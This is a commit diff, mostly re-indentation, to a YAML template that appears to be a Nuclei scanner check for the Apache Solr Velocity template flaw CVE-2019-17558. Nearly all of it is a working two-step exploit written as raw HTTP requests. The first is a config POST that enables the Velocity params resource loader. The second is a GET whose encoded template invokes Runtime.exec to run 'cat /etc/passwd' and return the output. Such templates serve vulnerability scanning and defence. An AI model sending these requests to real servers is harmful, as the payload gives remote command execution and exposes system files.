Update CVE-2019-17558.yaml

cves/CVE-2019-17558.yaml

@@ -5,46 +5,47 @@ info:
   author: pikpikcu
   severity: critical
 
-# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 <--good reference and it works
+# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
 # https://nvd.nist.gov/vuln/detail/CVE-2019-17558
 # Issues:-https://issues.apache.org/jira/browse/SOLR-13971
 
 requests:
-  - raw:  # Request: set "params.resource.loader.enabled"
+  - raw:   # Request: set "params.resource.loader.enabled"
-    - |
+      - |
-      POST /solr/atom/config HTTP/1.1
+        POST /solr/atom/config HTTP/1.1
-      Host: {{Hostname}}
+        Host: {{Hostname}}
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-      Accept-Language: en-US,en;q=0.5
+        Accept-Language: en-US,en;q=0.5
-      Accept-Encoding: gzip, deflate
+        Accept-Encoding: gzip, deflate
-      Connection: close
+        Connection: close
-      Content-Type: application/json
+        Content-Type: application/json
-      Content-Length: 259
+        Content-Length: 259
-      Upgrade-Insecure-Requests: 1
+        Upgrade-Insecure-Requests: 1
 
-      {
+        {
-        "update-queryresponsewriter": {
+            "update-queryresponsewriter": {
-          "startup": "lazy",
+              "startup": "lazy",
-          "name": "velocity",
+              "name": "velocity",
-          "class": "solr.VelocityResponseWriter",
+              "class": "solr.VelocityResponseWriter",
-          "template.base.dir": "",
+              "template.base.dir": "",
-          "solr.resource.loader.enabled": "true",
+              "solr.resource.loader.enabled": "true",
-          "params.resource.loader.enabled": "true"
+              "params.resource.loader.enabled": "true"
+            }
         }
-      }
 
-  # RCE via velocity template:
+      # RCE via velocity template:
-  # Get /etc/passwd
+      # Get /etc/passwd
-    - |
+
-      GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
+      - |
-      Host: {{Hostname}}
+        GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Host: {{Hostname}}
-      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-      Accept-Language: en-US,en;q=0.5
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-      Accept-Encoding: gzip, deflate
+        Accept-Language: en-US,en;q=0.5
-      Connection: close
+        Accept-Encoding: gzip, deflate
-      Upgrade-Insecure-Requests: 1
+        Connection: close
+        Upgrade-Insecure-Requests: 1
 
     matchers-condition: and
     matchers: